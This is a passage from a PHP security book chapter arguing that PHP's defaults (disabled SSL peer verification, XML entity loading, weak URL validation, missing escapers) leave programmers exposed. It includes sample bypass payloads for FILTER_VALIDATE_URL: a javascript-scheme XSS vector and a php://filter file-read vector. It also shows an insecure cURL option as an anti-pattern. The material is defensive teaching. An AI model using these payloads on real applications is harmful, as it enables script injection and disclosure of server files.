With the Session ID information disclosure leak, an attacker can predict the extra entropy value
that will be appended to the ID.
Once again, how do we assign blame? If Application X relies in uniqid() but the user or some other
application on the same server leak internal state about PHPs LCGs, we need to mitigate at both
ends. Users need to ensure that Session IDs use better entropy and third-party programmers need
to be concious that their methods of generating random values lack sufficient entropy and switch
to better alternatives (even where only weak entropy sources are possible!).
73
Anthonys RandomLib generates random bytes by mixing various entropy sources and localised
information which an attacker would need to work hard to guess. For example, you can mix
mt_rand(), uniqid() and lcg_value() output and go further by adding the PID, memory usage, another microtime measurement, a serialisation of $_ENV, posix_times(), etc. You can go even
further since RandomLib is extensible. For example, you could throw in some microsecond deltas
(i.e. measure how many microseconds some functions take to complete with pseudo-random input
such as hash() calls).
/**
* Generate a 32 byte random value. Can also use these other methods:
* - generateInt() to output integers up to PHP_INT_MAX
* - generateString() to map values to a specific character range
*/
$factory = new \RandomLib\Factory;
$generator = $factory->getMediumStrengthGenerator();
$token = hash(sha512, $generator->generate(32));
Arguably, due to RandomLibs footprint and the ready availability of the OpenSSL and Mcrypt
extensions, you can instead use RandomLib as a fallback proposition as used in the SecurityMultiTool PRNG generator class.
Articles:
74
CHAPTER 7
Secure By Design is a simple concept in the security world where software is designed from the
ground up to be as secure as possible regardless of whether or not it imposes a disadvantage to
the end user. The purpose of this principle is to ensure that users who are not security experts
can use the software without necessarily being obliged to jump through hoops to learn how to
secure their usage or, much worse, being tempted into ignoring security concerns which expose
unaddressed security vulnerabilities due to ignorance, inexperience or laziness. The crux of the
principle therefore is to promote trust in the software while, somewhat paradoxically, avoiding too
much complexity for the end user.
Odd though it may seem, this principle explains some of PHPs greatest security weaknesses. PHP
does not explicitly use Secure By Design as a guiding principle when executing features. Im sure
its in the back of developers minds just as Im sure it has influenced many if their design decisions,
however there are issues when you consider how PHP has influenced the security practices of PHP
programmers.
The result of not following Secure By Design is that all applications and libraries written in PHP
can inherit a number of security vulnerabilities, hereafter referred to as By-Default Vulnerabilities. It also means that defending against key types of attacks is undermined by PHP not offering
sufficient native functionality and Ill refer to these as Flawed Assumptions. Combining the two
sets of shortcomings, we can establish PHP as existing in an environment where security is being
compromised by delegating too much security responsibility to end programmers.
This is the focus of the argument I make in this article: Responsibility. When an application
is designed and built only to fall victim to a by-default vulnerability inherited from PHP or due
to user-land defenses based on flawed assumptions about what PHP offers in terms of security
defenses, who bears the responsibility? Pointing the finger at the programmer isnt wrong but it
also doesnt tell the whole story, and neither will it improve the security environment for other
programmers. At some point, PHP needs to be held accountable for security issues that it has a
direct influence on though its settings, its default function parameters, its documentation and its
lack thereof. And, at that point, questions need to be asked as to when the blurry line between
PHPs default behaviour and a security vulnerability sharpens into focus.
75
When that line is sharpened, we then reach another question - should PHPs status quo be challenged more robustly by labeling these by-default vulnerabilities and other shortcomings as something that MUST be fixed, as opposed to the current status quo (i.e. blame the programmer).
Its worth noting that PHP has no official security manual or guide, its population of security
books vary dramatically in both quality and scope (youre honestly better off buying something
non-specific to PHP than wasting your cash), and the documentation has related gaps and omitted assumptions. If anything, PHPs documentation is the worst guide to security you could ever
despair at reading, another oddity in a programming language fleeing its poor security reputation.
This is all wonderfully vague and abstract, and it sounds a lot like I blame PHP for sabotaging
security. In many cases, these issues arent directly attributable to PHP but are still exposed by
PHP so Im simply following the line of suggestion that if PHP did extensively follow Secure By
Design, there would be room for improvement and perhaps those improvements ought to be made.
Perhaps they should be catalogued, detailed, publicly criticised and the question asked as to why
these shortcomings are tolerated and changes to rectify them resisted.
Is that really such a controversial line of thought? If an application or library contained a feature
known to be susceptible to an attack, this would be called out as a security vulnerability without
hesitation. When PHP exposes a feature susceptible to attack, we...stick our heads in the sand and
find ways of justifying it by pointing fingers at everyone else? It feels a bit icky to me. Maybe it is
actually time we called a spade, a spade. And then used the damn thing to dig ourselves out of the
sand pit.
Lets examine the four most prominent examples I know of where PHP falls short of where I believe it needs to be and how they have impacted on how programmers practice security. Theres
another undercurrent here in that I strongly believe programmers are influenced by how PHP handles a particular security issue. Its not unusual to see programmers appeal to PHPs authority in
justifying programming practices.
1. SSL/TLS Misconfiguration
2. XML Injection Attacks
3. Cross-Site Scripting (Limited Escaping Features)
4. Stream Injection Attacks (incl. Local/Remote File Inclusion)
76
Chapter 7. PHP Security: Default Vulnerabilities, Security Omissions and Framing
Programmers?
attacker which means they can decrypt all messages received. This would be unnoticeable if the
MITM acted as a transparent go-between, i.e. client connects to MITM, MITM connects to server,
and MITM makes sure to pass all messages between the client and the server while still being able
to decrypt or manipulate ALL messages between the two.
Since verifying the identity of one or both parties is fundamental to secure SSL/TLS connections,
it remains a complete mystery as to why the SSL Context for PHP Streams defaults to disabling
peer verification, i.e. all such connections carry a by-default vulnerability to MITM attacks unless
the programmer explicitly reconfigures the SSL Context for all HTTPS connections made using
PHP streams or sockets. For example:
file_get_contents(https://www.example.com);
This function call will request the URL and is automatically susceptible to a MITM attack. The
same goes for all functions accepting HTTPS URLs (excluding the cURL extension whose SSL
handling is separate). This also applies to some unexpected locations such as remote URLs contained in the DOCTYPE of an XML file which well cover later in XML Injection Attacks. This
problem also applies to all HTTP client libraries making use of PHP streams/sockets, or where the
cURL extension was compiled using with-curlwrappers (there is a separate cURL Context for
this scenario where peer verifications is also disabled by default).
The options here are somewhat obvious, configuring PHP to use SSL properly is added complexity
that programmers are tempted to ignore. Once you go down that road and once you start throwing
user data into those connections, you have inherited a security vulnerability that poses a real risk
to users. Perhaps more telling is the following function call using the cURL extension for HTTPS
connections in place of PHP built-in feature.
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
This one is far worse than PHPs default position since a programmer must deliberately disable peer
verification in cURL. Thats blatantly the fault of the programmer and, yes, a lot of programmers
do this (Github has a search facility if you want to check for open source examples). To deliberately
disable SSLs protection of user data, assuming its not due to ignorance, can only be described as
loathsome and the tolerance afforded to such security vulnerabilities, at a time when browsers and
Certificate Authorities would be publicly and universally condemned for the same thing, reflects
extremely poorly on PHP programmers taking security seriously.
Seriously, do NOT do this. Yes, youll get more errors (browsers display big red warnings too).
Yes, end programmers may need to define a path to a CA file. Yes, this is all extra work (and
examples are scarce on the ground as to how to do it properly). No, it is NOT optional. Keeping
user data secure outweighs any programming difficulty. Deal with it.
Incidentally, youll notice this setting has two predicable strings: verify_peer and CURLOPT_SSL_VERIFYHOST. I suggest using grep or your preferred search method to scan your
source code and that of all libraries and frameworks for those strings so that you might see how
many vulnerabilities someone upstream injected into your hard work recently.
The question that arises is simple. If a browser screwed up SSL peer verification, they would be
77
universally ridiculed. If an application neglected to secure SSL connections, they would be both
criticised and possibly find themselves in breach of national laws where security has been legislated
to a minimum standard. When PHP disables SSL peer verification there is...what exactly? Do we
not care? Is it too hard?
Isnt this a security vulnerability in PHP? PHP is not exceptional. Its not special. Its just taking a
moronic stance. If it were not moronic, and security was a real concern, this would be fixed. Also,
the documentation would be fixed to clearly state how PHPs position is sustainable followed by
lots of examples of how to create secure connections properly. Even that doesnt exist which
appears suspicious since I know it was highlighted previously.
Kevin McArthur has done far more work in this area than I, so heres a link to his own findings on
SSL Peerjacking: http://www.unrest.ca/peerjacking
Now you can do a Github or grep search to find hundreds of vulnerabilities if not thousands. This
is of particular note because it highlights another facet of programming securely in PHP. What you
dont know will bite you. XML Injection is well known outside of PHP but within PHP it has
78
Chapter 7. PHP Security: Default Vulnerabilities, Security Omissions and Framing
Programmers?
been largely ignored which likely means there are countless vulnerabilities in the wild. The now
correct means of loading an XML document is as follows (by correct, I mean essential unless you
are 110% certain that the XML is from a trusted source received over HTTPS - with SSL peer
verification ENABLED to prevent MITM tampering).
$oldValue = libxml_disable_entity_loader(true);
$dom = new DOMDocument;
$dom->loadXML($xmlString);
foreach ($dom->childNodes as $child) {
if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
throw new \InvalidArgumentException(
Invalid XML: Detected use of disallowed DOCTYPE
);
}
}
libxml_disable_entity_loader($oldValue);
As the above suggests, locating the vulnerability in source code can be accomplished by searching for the strings libxml_disable_entity_loader and XML_DOCUMENT_TYPE_NODE. The absence of either string when DOM, SimpleXML and XMLReader are being used may indicate that
PHPs by-default vulnerabilities to XML Injection Attacks have not been mitigated.
Once again, who is the duck here? Do we blame programmers for not mitigating a vulnerability
inherited from PHP or blame PHP for allowing that vulnerability to exist by default? If it looks,
quacks and swims like a duck, maybe it is a security vulnerability in PHP afterall. If so, when can
we expect a fix? Never...like SSL Peerjacking by default?
79
filter_var($_GET[http_url], FILTER_VALIDATE_URL);
The above looks like it has no problem until you try something like this:
$_GET[http_url] = "javascript://foobar%0Aalert(1)";
This is a valid Javascript URI. The usual vector would be javascript:alert(1) but this is rejected by
the FILTER_VALIDATE_URL validator since the scheme is not valid. To make it valid, we can
take advantage of the fact that the filter accepts any alphabetic string followed by :// as a valid
scheme. Therefore, we can create a passing URL with:
javascript: - The universally accepted JS scheme //foobar - A JS comment! Valid and gives us the
double forward-slash %0A - A URL encoded newline which terminates the single line comment
alert(1) - The JS code we intend executing when the validator fails
This vector also passes with the FILTER_FLAG_PATH_REQUIRED flag enabled so the lesson
here is to be wary of these built in validators, be absolutely sure you know what each really does
and avoid assumptions (the docs are riddled with HTTP examples, as are the comments, which is
plain wrong). Also, validate the scheme yourself since PHPs filter extension doesnt allow you to
define a range of accepted schemes and defaults to allowing almost anything...
$_GET[http_url] = "php://filter/read=convert.base64-encode/resource=/path/to/file
This also passes and is usable in most PHP filesystem functions. It also, once again, drives home
the thread running through all of these examples. If these are not security vulnerabilities in PHP,
what the heck are they? Who builds half of a URL validator, omits the most important piece, and
then promotes it to core for programmers to deal with its inadequacies. Maybe were blaming
inexperienced programmers for this one too?
80
Chapter 7. PHP Security: Default Vulnerabilities, Security Omissions and Framing
Programmers?
HTML Context
The commonly used htmlspecialchars() function is the object of programmer obsession. If you believed most of what you read, htmlspecialchars() is the only escaping function in PHP and HTML
Body escaping is the only escaping strategy you need to be aware of. In reality, it represents just
one escaping strategy - there are four others commonly needed.
When used carefully, wrapped in a secured function or closure, htmlspecialchars() is extremely effective. However, its not perfect and it does have flaws which is why you need a wrapper in the first
place, particularly when exposing it via a framework or templating API where you cannot control
its end usage. Rather than reiterate all the issues here, Ive already written a previous article detailing an analysis of htmlspecialchars() and scenarios where it can be compromised leading to escaping bypasses and XSS vulnerabilities: http://blog.astrumfutura.com/2012/03/a-hitchhikers-guideto-cross-site-scripting-xss-in-php-part-1-how-not-to-use-htmlspecialchars-for-output-escaping/
HTML Attribute Context
PHP does not offer an escaper dedicated to HTML Attributes.
This is required in the event that a HTML attribute is unquoted - which is entirely valid in HTML5,
for example. htmlspecialchars() MUST NEVER be used for unquoted attributed values. It must
also never be used for single quoted attribute values unless the ENT_QUOTES flag was set. Without additional userland escaping, such as that used by ZendEscaper, this means that all templates
regardless of origin should be screened to weed out any instances of unquoted/single quoted attribute values.
Javascript Context
PHP does not offer an escaper dedicated to Javascript.
Programmers do, however, sometimes vary between using addslashes() and json_encode(). Neither
function applies secure Javascript escaping by default, and not at all in PHP 5.2 or for non-UTF8
character encodings, and both types of escaping are subtly different from literal string and JSON
encoding. Abusing these functions is certainly not recommended. The correct means of escaping
Javascript as part of a HTML document has been documented by OWASP for some time and
implemented in its ESAPI framework. A port to PHP forms part of ZendEscaper.
CSS Context
PHP does not offer an escaper dedicated to CSS. A port to PHP of OWASPs ESAPI CSS escaper
forms part of ZendEscaper.
As the above demonstrates, PHP covers 2 of 5 common HTML escaping contexts. There are
gaps in its coverage and several flaws in one that it does cover. This track record very obviously
81
shows that PHP is NOT currently concerned about implementing escaping for the webs second
most populous security vulnerability - a sentiment that has unfortunately pervaded PHP given the
serious misunderstandings around context-based escaping in evidence. Perhaps PHP could rectify
this particular environmental problem, once and for all, by offering dedicated escaper functions or
a class dedicated to this task? Ive drafted a simple RFC for this purpose if anyone is willing, with
their mega C skills, to take up this banner: https://gist.github.com/3066656
82
Chapter 7. PHP Security: Default Vulnerabilities, Security Omissions and Framing
Programmers?
7.5 Conclusion
While a lengthy article, the core purpose here is to illustrate a sampling of PHP behaviours which
exist at odds with good security practices and to pose a few questions. If PHP is a secure programming language, why is it flawed with such insecure defaults and feature omissions? If these are
security vulnerabilities in applications and libraries written in PHP, are they not also therefore vulnerabilities in the language itself? Depending on how those questions are answered, PHP appears
to be both aware of yet continually ignoring serious shortcomings in its security.
At the end of the day, all security vulnerabilities must be blamed on someone - either PHP is at fault
and it needs to be fixed or programmers are at fault for not being aware of these issues. Personally,
I find it difficult to blame programmers. They expect their programming language to be secure
and its not an unreasonable demand. Yes, tighening security may make a programmers life more
difficult but this misses an important point - by not tightening security, their lives are already more
difficult with userland fixes being required, configuration options that need careful monitoring, and
documentation omissions, misinformation and poor examples leading them astray.
So PHP, are you a secure programming language or not? Im no longer convinced that you are and
I really dont feel like playing dice with you anymore.
This article can be discussed or commented on at: http://blog.astrumfutura.com/2012/08/phpsecurity-default-vulnerabilities-security-omissions-and-framing-programmers/
7.5. Conclusion
83
84
Chapter 7. PHP Security: Default Vulnerabilities, Security Omissions and Framing
Programmers?
CHAPTER 8
genindex
modindex
search
85